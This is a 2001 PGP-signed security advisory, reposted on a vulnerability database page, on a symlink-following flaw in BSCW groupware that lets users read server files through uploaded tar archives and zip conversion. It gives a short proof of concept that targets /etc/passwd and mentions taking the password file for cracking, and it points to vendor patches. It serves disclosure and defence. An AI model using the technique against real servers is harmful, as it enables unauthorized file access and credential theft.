Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:1964
HistoryAug 23, 2001 - 12:00 a.m.

BSCW symlink vulnerability

2001-08-2300:00:00
vulners.com
17
JSON

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

BSCW Security Issues

[ Vulnerability Type ]
The BSCW software follows symlinks.

[ Effect ]
malicious user can read every file on system that BSCW UID can read.

[ Software affected ]
BSCW3.x (only on *ix systems)

[ Severity ]
medium risk / high risk

[ Solution ]
install patches / updates from http://bscw.gmd.de/pycXX , where XX is
the version of your python installation.

DESCRIPTION:

BSCW is a groupware system that runs on a webserver. For more information
about BSCW visit the developer website (http://bscw.gmd.de/ and
http://www.orbiteam.de ).

While playing around with symlinks and how the BSCW system handles them, i
noticed that it follows symlinks. Since it offers users the ability to extract
.tar files into their "data-bag" (private space), symlink following can be
exploited by a malicious user. To to this he/she needs to create a .tar file
that contains a symlink, pointing to a file he/she wants to read. After this
.tar file has been uploaded to the BSCW server and extracted by clicking on
the "extract" menu option, the "data-bag" of the user contains the symlink as
a BSCW data object. Clicking on it will make the BSCW system follow the
symlink and retrieve the target file, so the user is able to download/view
it.

Example:

my_host:/tmp/>ln -s /etc/passwd testlink
my_host:/tmp/>tar cvf testlink.tar testlink

After uploading it to the BSCW server and extracting it, you can click on the
"testlink" item in your "data-bag" and retrieve the /etc/passwd file of the
server.

Basically the attacker can view any file on a system, as long as the UID,
under which the BSCW system is running, could access it. In most cases this
will be the same UID as the webserver UID (nobody, wwwrun). This can give
the malicious user access to BSCW data items, he could normally not read, or
worse, it could be used to retrieve the BSCW password file for cracking other
user passwords or information gathering for further system penetration.

The early "op_extract" fixes that but leaves a few other exploitable issues.

Another vulnerability consists in the standard installation which includes a
call of "zip" tool when converting .tar files to .zip files. After the
"op_extract" patch you could not access the symlink, since the new extract
function checks for symlinks after tar is called. By converting the
attackers .tar file to a .zip file, zip will follow the symlink and pack
the file, which was targeted by the link. If you have customized calls
to external programs (e.g. packer conversion utilities) in your BSCW
system configuration, you should check if symlink following can be exploited).

The latest patch "untar.py" introduces a wrapper, which looks for symlinks
and seem to fix all symlink vulnerabilities.

You can download the patches and view the installation instructions at
http://bscw.gmd.de/pycXX , where XX is the version of your installed python
package (e.g. http://bscw.gmd.de/pyc20 for python 2.0).

The developers of bscw have done a good job patching the security holes
within 24h, after i sent them a notice about the vulnerability.

neovatar
neovatar(at)wiretap(dot)de
public key at http://www.wiretap.de/neovatar.pub

DISCLAIMER:
im not affiliated with GMD or ORBITEAM or BSCW in any way. Registered
trademarks and terms in this report belong to their owners.

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.6 (GNU/Linux)
Comment: For info see http://www.gnupg.org

iD8DBQE7hFTBzEyYWk8cQasRAhAiAKCOCYleJnk49KxPDzAht2GPwKmbKgCdGQBq
iHXuhdS5onO9/JAs97FhrH0=
=gmh1
-----END PGP SIGNATURE-----

JSON